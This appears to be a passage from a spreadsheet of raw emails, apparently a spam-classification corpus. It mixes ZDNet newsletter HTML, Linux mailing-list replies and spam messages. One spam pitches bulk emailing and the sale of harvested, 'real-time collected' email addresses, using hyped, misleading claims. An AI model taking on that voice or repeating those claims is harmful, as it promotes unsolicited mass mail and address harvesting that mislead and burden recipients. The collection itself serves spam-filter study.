       src="http://www.cnet.com/i/sh/nl/b.gif" width=1&gt;&lt;/TD&gt;
     &lt;TD width=3 bgColor=#ffffff rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=2&gt;&lt;/TD&gt;
     &lt;TD width=582 bgColor=#ffffff&gt;&lt;IMG height=5 src="http://www.cnet.com/i/sh/nl/b.gif" 
       width=1&gt;&lt;/TD&gt;
     &lt;TD width=3 bgColor=#ffffff rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=2&gt;&lt;/TD&gt;
     &lt;TD width=1 bgColor=#000000 rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=1&gt;&lt;/TD&gt;
     &lt;TD width=10 bgColor=#1E5C99 rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=10&gt;&lt;/TD&gt;
     &lt;TD width=1 bgColor=#83A3CB rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=612 border=0&gt;
   &lt;TBODY&gt;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width=12 bgColor=#ffffff&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
       width=12&gt;&lt;/TD&gt;
     &lt;TD width=564 bgColor=#ffffff&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;BR&gt;
 &lt;!--Elsewhere --&gt;
       &lt;FONT face="arial, helvetica" color=#990000 size=+1&gt;&lt;B&gt;Elsewhere on ZDNet&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1 src="http://www.zdnet.com/b.gif" 
             width=1 NOSEND="1"&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD&gt;&lt;IMG height=4 src="http://www.zdnet.com/b.gif" width=1 
             NOSEND="1"&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=18-WhdzI98qBTvssDxTiMEyR1N675iR" &gt;Veritas CEO Gary Bloom speaks out at Tech Update.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=2d-OxQyIbKH-eDDuFpVdngyV7VDjSPR" &gt;Check out these personal laser printer picks at ZDNet Reviews.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=42-rF7cIPKSKxmmrB8pz3F7_4EMIrdR" &gt;See how WAP works and how you should use it at Builder.com.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=57-YJIXII04FxtViM7F0F_wt9Q9dZuR" &gt;Need a new job? Find one today in ZDNet's Career Center.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6c-SUL3IuPjjfx1jMjKQCL5-NPyEdsR" &gt;CIOs talk out about the future of IT at CNET News.com.&lt;/A&gt;
 &lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
     &lt;TD width=12 bgColor=#ffffff&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
       width=12&gt;&lt;/TD&gt;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
 &lt;!-- footer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href="http://clickthru.online.com/Click?q=82-P0EYQXK1S0cdLXs6gJLkjCXMZHnR" &gt;free newsletters&lt;/a&gt; from ZDNet&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width="1" height="5"&gt;&lt;br&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-zdnet@spamassassin.taint.org&lt;p&gt;
 &lt;a NOTRACK href='http://clickthru.online.com/Click?q=97-dlaYrmMiZ4Ub09Vtka-b7oZ9nKnRRdRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=ac-RbKtQ0UKmLcwUCldWfGJ0kSyVjyR" &gt;Change e-mail format&lt;/a&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=c1-PIljQpWqpys1FT2wiOPYOLipujlR" &gt;Change e-mail address&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=d6-yw2KQMPdP0YsaNenOIRzw0LGkk4R" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=eb-HlpoQkDFITjVllydo6MzbuNK5xrR" &gt;Advertise&lt;/a&gt;&lt;br&gt;&lt;/font&gt;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href="http://clickthru.online.com/Click?q=01-9oXDI2jHgIC18rwvurMPGPxZ6RlR" &gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://clickthru.online.com/Click?q=16-T_cjI4cFVqywiQxDblRuaBDxRU4R" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://clickthru.online.com/Click?q=2b-2FVYINzsBDmDzYmwzk0xBfd-8WrR" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=40-6Pp4Idn8DzSUoVceVXCHnpqL0wRR" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=55-TAHaIKJ8XqZ8Derqm86ccJ_2d2ZR" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=6b-8g5ZIHEcwpragO280ywQ-4d0P6cR" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=80-KTKvQQ0KirzAF63oaDkjVsTLZ8iR" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=95-XdwrQvdJorTt9lEr1yZeU_u_KnPR" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=aa-gBteQXUr2M_wl8cWLXZBXqONOVnR"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src="http://gserv.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e505&amp;ISSUE=2002-07-12" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=bf-Jtif-mZ-g9YZGDsAsLe3l2KygdRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: An Invitation from Lisa@freightmart.com
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;FREIGHTMART Mail Campaign&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html;"&gt;
 &lt;DIV align="center"&gt;
 	&lt;a href="http://www.freightmart.com"&gt;&lt;img src="http://www.freightmart.com/images/ads/emailcampaign.gif" alt="" border="0"&gt;&lt;/a&gt;
 	&lt;br&gt;&lt;br&gt;To be REMOVED from any future offers, simply &lt;a href="mailto:remove@freightmart.com?subject=REMOVE"&gt;CLICK HERE!&lt;/a&gt;
 	&lt;br&gt;For more info, &lt;a href="mailto:lisa@freightmart.com?subject=Need More Info"&gt;CLICK HERE!&lt;/a&gt;
 &lt;/DIV&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 2002-08-28 at 23:48, Ville Skytt wrote:
 &gt; &gt; The devices are there now, thank Gordon for reporting the problem (and as I
 &gt; &gt; said, you were the only one). Any further comments are very welcome!
 &gt; &gt; 
 &gt; &gt; Download : http://ftp.freshrpms.net/pub/freshrpms/testing/alsa/
 &gt; &gt; New spec : http://freshrpms.net/builds/alsa-driver/alsa-driver.spec
 &gt; 
 &gt; Ahh, wonderful!  Just tried out these and *finally* got sound working
 &gt; with my Abit TH7II-RAID's integrated audio.  I've been pulling hair
 &gt; together with the (helpful) OpenSound people for quite some time now,
 &gt; but we've failed to get sound to work, either with the drivers included
 &gt; in kernel, or the commercial OSS.
 &gt; 
 &gt; Thanks a *lot* !  The RPMs seem to be fine, they worked for me out of
 &gt; the box (on vanilla Valhalla w/latest errata).
 ...except that I don't see an init script in the RPMs, a sample one
 designed for RH is supposed to be in "utils/alsasound".  Could you take
 a look if it can be included?
 Cheers,
 -- 
 \/ille Skytt
 ville.skytta at iki.fi
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: E-Market Today! Get your advertising Boost!13474
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!doctype html public "-//w3c//dtd html 4.0 transitional//en"&gt;
 &lt;html&gt;
 &lt;head&gt;
    &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8=
 859-1"&gt;
    &lt;meta name=3D"GENERATOR" content=3D"Mozilla/4.79 [en] (Windows NT 5.0; =
 U) [Netscape]"&gt;
    &lt;title&gt;Specialized Acquired E-Mail Addresses&lt;/title&gt;
 &lt;/head&gt;
 &lt;body text=3D"#000000" bgcolor=3D"#FFFFFF" link=3D"#006699" vlink=3D"#0066=
 99" alink=3D"#FF3333"&gt;
 &amp;nbsp; 
 &lt;center&gt;
   &lt;table BORDER=3D0 CELLSPACING=3D5 CELLPADDING=3D5 WIDTH=3D"640" BGCOLOR=3D=
 "#336600" &gt;
     &lt;tr&gt; 
       &lt;td WIDTH=3D"10"&gt;&lt;font color=3D"#00CC00"&gt;&lt;/font&gt;&amp;nbsp;&lt;/td&gt;
       &lt;td HEIGHT=3D"1" BGCOLOR=3D"#9900FF"&gt;&amp;nbsp;&lt;/td&gt;
       &lt;td WIDTH=3D"10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt; 
       &lt;td&gt;&amp;nbsp;&lt;/td&gt;
       &lt;td ALIGN=3DCENTER VALIGN=3DCENTER HEIGHT=3D"20" BGCOLOR=3D"#9900FF"=
 &gt; 
         &lt;center&gt;
           &lt;table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D0 WIDTH=3D"600" =
 &gt;
             &lt;tr&gt; 
               &lt;td WIDTH=3D"0" HEIGHT=3D"0"&gt;&lt;/td&gt;
               &lt;td WIDTH=3D"0" HEIGHT=3D"40" bgcolor=3D"#FFFFFF" valign=3D"=
 top"&gt; 
                 &lt;div align=3D"center"&gt;&lt;font face=3D"Verdana, Arial, Helvet=
 ica, sans-serif"&gt;&lt;font color=3D"#FFFFFF"&gt;&lt;font size=3D"-2" color=3D"#33333=
 3"&gt;To 
                   be deleted from our mailing list, send us an email messa=
 ge to: 
                   &lt;a href=3D"mailto:437notoday@excite.com"&gt;&lt;b&gt;mailto:437no=
 today@excite.com&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
                   &lt;font size=3D"-2" color=3D"#333333"&gt;with the words "&lt;b&gt;R=
 emove-Me"&lt;/b&gt; 
                   in the subject heading.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
               &lt;/td&gt;
               &lt;td WIDTH=3D"0"&gt;&lt;/td&gt;
             &lt;/tr&gt;
             &lt;tr&gt; 
               &lt;td WIDTH=3D"0"&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&lt;/font&gt;&lt;/td&gt;
               &lt;td WIDTH=3D"0" HEIGHT=3D"0" BGCOLOR=3D"#FFFFFF" valign=3D"t=
 op"&gt; 
                 &lt;table width=3D"100%" border=3D"0" cellspacing=3D"3" cellp=
 adding=3D"3"&gt;
                   &lt;tr&gt; 
                     &lt;td width=3D"0" height=3D"0"&gt; 
                       &lt;p align=3D"center"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2" color=3D"#FF0000"&gt;&lt;b&gt;Don't 
                         delete this message before reading!!! You will fin=
 d valuable 
                         information that could make a difference in how yo=
 u advertise 
                         your business today and in the future!!!&lt;/b&gt;&lt;/font=
 &gt;&lt;/p&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt; 
                     &lt;td width=3D"0" height=3D"0"&gt; 
                       &lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D=
 "2" color=3D"#0000CC"&gt;&lt;br&gt;
                         Hi, My name is Daniel and I have been involved in =
 Internet 
                         Marketing since its inception. E-marketing provide=
 s individuals 
                         and businesses with a low cost solution for broad-=
 based 
                         advertising&lt;/font&gt;&lt;/p&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt; 
                     &lt;td width=3D"0" height=3D"0"&gt; 
                       &lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D=
 "2" color=3D"#0000CC"&gt;&lt;br&gt;
                         If you are new to this concept do not fret! I was =
 too! 
                         It took me over 2 years of research by scowering t=
 he Internet, 
                         dealing with false claims, hassling with the (so-c=
 alled) 
                         &amp;quot;bulk-mail specialists&amp;quot; experiencing the=
  trials 
                         and errors &amp;quot;bogus&amp;quot; software programs and=
  false 
                         claims they make, to truly understand the ins &amp;amp=
 ; outs 
                         of marketing concepts and principles of email mark=
 eting.&lt;/font&gt;&lt;/p&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt; 
                     &lt;td width=3D"0" height=3D"0"&gt; 
                       &lt;ul&gt;
                         &lt;li&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" si=
 ze=3D"2"&gt;&lt;b&gt;These 
                           processes are time consuming, resource intensive=
 , frustrating 
                           and potentially expensive for individuals and co=
 mpanies 
                           to do on their own.&lt;/b&gt;&lt;/font&gt;&lt;/li&gt;
                       &lt;/ul&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt; 
                     &lt;td width=3D"0" height=3D"0"&gt; 
                       &lt;ul&gt;
                         &lt;li&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" si=
 ze=3D"2" color=3D"#660066"&gt;Let's 
                           face it! Most people in business want to make mo=
 ney! 
                           Their time is consumed by running their business=
 , developing 
                           marketing campaigns and advertisement, cashing c=
 hecks, 
                           dealing with customers, managing their staff and=
  so 
                           on!&lt;/font&gt;&lt;/li&gt;
                         &lt;li&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" si=
 ze=3D"2" color=3D"#660066"&gt;They 
                           don't have time to invest in learning 10 or 15 d=
 ifferent 
                           software applications, learn how to effectively =
 port 
                           scan for IPS, Socks and SMTP relays, spend thous=
 ands 
                           of dollars for &amp;quot;The Best&amp;quot; software app=
 lications, 
                           spend hours testing applications for the best re=
 sults 
                           or for that matter, spending 2 or more years to =
 learn 
                           what someone else has already mastered!&lt;/font&gt;&lt;/=
 li&gt;
                       &lt;/ul&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt; 
                     &lt;td width=3D"0" height=3D"0"&gt; 
                       &lt;ul&gt;
                         &lt;li&gt;&lt;font color=3D"#0000CC"&gt;&lt;b&gt;&lt;font face=3D"Arial=
 , Helvetica, sans-serif" size=3D"2"&gt;If 
                           you are interested in increasing your effectiven=
 ess 
                           with email marketing, increasing your client bas=
 e, maximizing 
                           your target market or boosting you revenue in a =
 specific 
                           area or geographic territory, then this is were =
 we can 
                           help.&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/li&gt;
                       &lt;/ul&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt; 
                     &lt;td width=3D"0" height=3D"0"&gt; 
                       &lt;blockquote&gt; 
                         &lt;p&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-s=
 erif"&gt;&lt;font size=3D-1&gt;&lt;b&gt;To 
                           find out more, send request &lt;/b&gt;with the words "=
 &lt;b&gt;&lt;font color=3D"#FF0000"&gt;Tell 
                           Me More&lt;/font&gt;&lt;/b&gt;" in the subject line or body =
 to&lt;b&gt;: 
                           &lt;/b&gt;&lt;b&gt;&lt;font face=3D"Verdana, Arial, Helvetica, =
 sans-serif"&gt;&lt;font size=3D-1&gt;&lt;a href=3D"mailto:hhmiyahara@excite.com"&gt;mailt=
 o:hhmiyahara@excite.com&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
                       &lt;/blockquote&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt; 
                     &lt;td width=3D"0" height=3D"0"&gt; 
                       &lt;ul&gt;
                         &lt;li&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" si=
 ze=3D"2" color=3D"#0000CC"&gt;LCM 
                           provides simple, effective, low-cost solutions f=
 or those 
                           interested in broad-based marketing. By utilizin=
 g special, 
                           custom-designed software applications, we are ab=
 le to 
                           provide broad-based delivery of your advertiseme=
 nts 
                           to millions of people all over the world!&lt;/font&gt;=
 &lt;/li&gt;
                       &lt;/ul&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt; 
                     &lt;td width=3D"0" height=3D"0"&gt; 
                       &lt;div align=3D"center"&gt;&lt;font face=3D"Arial, Helvetica=
 , sans-serif" size=3D"2"&gt;&lt;b&gt;&lt;font size=3D"3" color=3D"#FF0000"&gt;We 
                         are probably one of the most important assets you =
 will 
                         need!&lt;/font&gt;&lt;font size=3D"3"&gt; &lt;/font&gt;&lt;/b&gt; &lt;/font&gt;&lt;=
 /div&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt; 
                     &lt;td width=3D"0" height=3D"0"&gt; 
                       &lt;ul&gt;
                         &lt;li&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" si=
 ze=3D"2" color=3D"#0000CC"&gt;Whether 
                           you are trying to promote to 50,000 or 50,000,00=
 0 consumers, 
                           individuals and/or businesses, we can assist you=
  in 
                           launching a successful marketing campaign that c=
 an potentially 
                           generate increased revenue, sales and customers.=
 &lt;/font&gt;&lt;/li&gt;
                       &lt;/ul&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt; 
                     &lt;td width=3D"0" height=3D"0"&gt; 
                       &lt;ul&gt;
                         &lt;li&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" si=
 ze=3D"2" color=3D"#0000CC"&gt;We 
                           also specialize in the acquistion of targeted e-=
 mail 
                           addresses! Our unique service is customized to f=
 it your 
                           needs. These addresses are collected on a per re=
 quest 
                           basis which provides you with the most up-to-dat=
 e list 
                           of e-mail addresses anywhere! These addresses ar=
 e not 
                           months or years old!!! They are collected on a p=
 er request 
                           basis in realtime which means they are the most =
 current 
                           and up-to-date addresses, PERIOD!&lt;/font&gt;&lt;/li&gt;
                       &lt;/ul&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt; 
                     &lt;td width=3D"0" height=3D"0"&gt; 
                       &lt;ul&gt;
                         &lt;li&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" si=
 ze=3D"2" color=3D"#0000CC"&gt;The 
                           average collection time is 3-5 working days for =
 up to 
                           5 cities or Categories! All addresses are proces=
 sed 
                           cleaned, stripped, domain verified with foreign =
 domains 
                           removed to provide you with clean deliverable e-=
 mail 
                           addresses for the best&amp;nbsp;possible results for=
  your 
                           campaign!&lt;/font&gt;&lt;/li&gt;
                       &lt;/ul&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt; 
                     &lt;td width=3D"0" height=3D"0"&gt; 
                       &lt;blockquote&gt; 
                         &lt;p&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-s=
 erif"&gt;&lt;font size=3D-1&gt;&lt;b&gt;To 
                           find out more, send request &lt;/b&gt;with the words "=
 &lt;b&gt;&lt;font color=3D"#FF0000"&gt;Tell 
                           Me More&lt;/font&gt;&lt;/b&gt;" in the subject line or body =
 to&lt;b&gt;: 
                           &lt;/b&gt;&lt;b&gt;&lt;font face=3D"Verdana, Arial, Helvetica, =
 sans-serif"&gt;&lt;font size=3D-1&gt;&lt;a href=3D"mailto:hhmiyahara@excite.com"&gt;mailt=
 o:hhmiyahara@excite.com&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;font face=3D"A=
 rial, Helvetica, sans-serif" size=3D"2"&gt;&lt;/font&gt;&lt;/p&gt;
                       &lt;/blockquote&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt; 
                     &lt;td height=3D"0" width=3D"0"&gt; 
                       &lt;ul&gt;
                         &lt;li&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" si=
 ze=3D"2"&gt;Every 
                           order is handled individually with the greatest =
 amount 
                           of intregity to ensure clean, quality addresses.=
 &amp;nbsp;Unlike 
                           many of your fly-by night companies, our product=
  is 
                           quality,&lt;br&gt;
                           professional and current! We can also be contact=
 ed during 
                           normal business hours to answer all of your ques=
 tions!&lt;/font&gt;&lt;/li&gt;
                         &lt;li&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" si=
 ze=3D"2"&gt;Whether 
                           you have an item to sell, a philosophy to share =
 or a 
                           way conduct surveys on a national scale, E-mail =
 marketing 
                           provides you with the most inexpensive and broad=
 est 
                           target&lt;br&gt;
                           of any other form of advertising in the world to=
 day!!!&lt;/font&gt;&lt;/li&gt;
                       &lt;/ul&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt; 
                     &lt;td width=3D"0" height=3D"0"&gt; 
                       &lt;ul&gt;
                         &lt;li&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" si=
 ze=3D"2"&gt;This 
                           form of marketing has been around since 1995 and=
  has 
                           grown to be one of the biggest moneymakers of bu=
 siness 
                           today and long into our future!!! &lt;/font&gt;&lt;/li&gt;
                         &lt;li&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" si=
 ze=3D"2"&gt;There 
                           are many fortune 500 companies that participate =
 in this 
                           form of advertising because it WORKS!!! Just loo=
 k at 
                           your emails!! &lt;/font&gt;&lt;/li&gt;
                         &lt;li&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" si=
 ze=3D"2"&gt;By 
                           placing your ad over the Internet and directly i=
 nto 
                           the mailboxes of consumers just like you, you ca=
 n potentially 
                           generate hundress of thousands of dollars with a=
 lmost 
                           anything.&lt;/font&gt;&lt;/li&gt;
                       &lt;/ul&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt; 
                     &lt;td height=3D"0" width=3D"0"&gt; 
                       &lt;ul&gt;
                         &lt;li&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" si=
 ze=3D"2"&gt;Every 
                           year the number of users increases tremendously =
 creating 
                           a huge market. Why not become part of this unlim=
 ited 
                           market by participating in the fastest growing f=
 orm 
                           of advertising in the world!&lt;/font&gt;&lt;/li&gt;
                       &lt;/ul&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt; 
                     &lt;td width=3D"0" height=3D"0"&gt; 
                       &lt;blockquote&gt; 
                         &lt;p&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-s=
 erif"&gt;&lt;font size=3D-1&gt;&lt;b&gt;To 
                           find out more, send request &lt;/b&gt;with the words "=
 &lt;b&gt;&lt;font color=3D"#FF0000"&gt;Tell 
                           Me More&lt;/font&gt;&lt;/b&gt;" in the subject line or body =
 to&lt;b&gt;: 
                           &lt;/b&gt;&lt;b&gt;&lt;font face=3D"Verdana, Arial, Helvetica, =
 sans-serif"&gt;&lt;font size=3D-1&gt;&lt;a href=3D"mailto:hhmiyahara@excite.com"&gt;mailt=
 o:hhmiyahara@excite.com&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;font face=3D"A=
 rial, Helvetica, sans-serif" size=3D"2"&gt;&lt;/font&gt;&lt;/p&gt;
                       &lt;/blockquote&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                 &lt;/table&gt;
                 &lt;div align=3D"center"&gt;&lt;font face=3D"Verdana, Arial, Helvet=
 ica, sans-serif"&gt;&lt;font size=3D-2&gt;&lt;br&gt;
                   To be deleted from our mailing list, send us an email me=
 ssage 
                   to: &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif"=
 &gt;&lt;font color=3D"#FFFFFF"&gt;&lt;font size=3D-2&gt;&lt;a href=3D"mailto:437notoday@exci=
 te.com"&gt;&lt;b&gt;mailto:437notoday@excite.com&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt; 
                   with the words "&lt;b&gt;Remove-Me"&lt;/b&gt; in the subject heading=
 .&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
               &lt;/td&gt;
               &lt;td WIDTH=3D"0" BGCOLOR=3D"#000000"&gt;&lt;font face=3D"Arial, Hel=
 vetica, sans-serif" size=3D"2"&gt;&lt;/font&gt;&lt;/td&gt;
             &lt;/tr&gt;
             &lt;tr&gt; 
               &lt;td WIDTH=3D"0" HEIGHT=3D"0" BGCOLOR=3D"#CC9900"&gt;&lt;/td&gt;
               &lt;td WIDTH=3D"0" HEIGHT=3D"0" BGCOLOR=3D"#009900"&gt;&lt;/td&gt;
               &lt;td WIDTH=3D"0" HEIGHT=3D"0" BGCOLOR=3D"#009900"&gt;&lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
         &lt;/center&gt;
       &lt;/td&gt;
       &lt;td&gt;&amp;nbsp;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">In a message dated: Thu, 22 Aug 2002 13:53:55 CDT
 Ulises Ponce said:
 &gt;Thanks Paul,
 &gt;That is the way I am doing right now, but I would like to NOT use the mouse 
 &gt;for such things. Any other clue?
 The best I can think of is to figure out what the command being 
 issued by exmh is that selects and inserts the sig and bind that to a 
 key sequence.  That shouldn't be *too* difficult, it's just a matter 
 of figuring out the tcl (something my perl-based brain isn't excited 
 about :)
 -- 
 Seeya,
 Paul
 --
 	It may look like I'm just sitting here doing nothing,
    but I'm really actively waiting for all my problems to go away.
 	 If you're not having fun, you're not doing it right!
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Dear Steve Jobs: At Macworld, show me this... [ANCHORDESK]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</si>
  <si>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=3Dab-ZcQKQYpdinCImwyXydit0M-0OvrR" &gt;&lt;img src=3D"http://www.zdnet.com/graph=
 ics/newsletters/hd_anchor.gif" width=3D"440" height=3D"60" border=3D"0"  al=
 t=3D"AnchorDesk Daily"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D160 align=3Dcenter valign=3Dtop rowspan=3D2 bgcolor=3D"#ffffff"=
 &gt;
        &lt;br&gt;
         &lt;!--tower --&gt;
       &lt;div align=3D"center"&gt;&lt;img src=3D"http://i.i.com.com/cnwk.1d/Ads/comm=
 on/advertisement.gif" width=3D"120" height=3D"10" border=3D"0"&gt;&lt;/br&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dc1-PIljQpWqZ4c33UjwiOPYOLi=
 pujlR" target=3D"new"&gt;  =20
 &lt;img src=3D"http://www.techrepublic.com/images/ads/ban_160x600_domainsgirl3=
 .gif" width=3D"160" height=3D"600" border=3D"0"&gt;
 &lt;/a&gt;&lt;/div&gt;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href=3D"http://clickthru.online.com/Click?q=3Dd6-yw2KQMP=
 dL6mVSHPnOIRzw0LGkk4R" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Need a memory upgrade? Find out with CNET's Memory Configurator.&lt;/b&gt;&lt;/font&gt;=
 &lt;/a&gt;&lt;br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" h=
 eight=3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Deb-HlpoQkD=
 FMhDs2Pndo6MzbuNK5xrR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Clearance Center: Get discounts on PCs, PDAs, MP3 players and more!&lt;/b&gt;&lt;/fo=
 nt&gt;&lt;/a&gt;&lt;br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1=
